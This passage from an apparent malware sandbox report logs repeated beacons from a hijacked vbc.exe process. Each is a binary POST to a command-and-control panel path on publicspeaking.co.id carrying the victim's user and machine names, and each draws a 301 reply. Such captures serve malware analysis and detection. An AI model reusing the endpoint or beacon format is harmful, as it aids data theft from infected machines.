                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:25.864240885 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.54973792.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:26.145272970 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:26.270737886 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:27.824202061 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:27 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: b886d46228010ac6e19e1562fe249be4-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.331
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:27.824429989 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.54974492.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:28.086251020 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:28.206248999 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:29.795475960 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:29 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: a565fa61965b6adfa6ef3ee3a794d877-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.353
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:29.795531988 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.54975092.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:30.074321985 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:30.193985939 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:31.769417048 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:31 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: e42e26dbbf84d35b24c549cddccd17a4-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.336
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:31.769454002 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  12192.168.2.54975692.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:32.051146984 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:32.170808077 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:33.666448116 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:33 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: f44263a51dda31a120b0589d5213affb-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.358
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:33.666508913 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  13192.168.2.54976292.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:33.928828955 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:34.048387051 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:35.539851904 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:35 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: c5a09b05cc3517972fbcae45c01a48dc-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.341
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:35.539885998 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  14192.168.2.54976892.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:35.857846975 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:35.977484941 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:37.539196014 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:37 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 9053b43efe2d10ccbae37652458273bb-fra-edge2
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.336
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:37.539438009 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  15192.168.2.54977192.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:37.802879095 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 153
                                  Connection: close
                                  Dec 22, 2024 14:12:37.922549009 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:38.242805004 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: (ckav.rualfons965543ALFONS-PC0FDD42EE188E931437F4FBE2C
                                  Dec 22, 2024 14:12:39.530751944 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:39 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: ecac579596386838ef2624393f703bf3-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.381
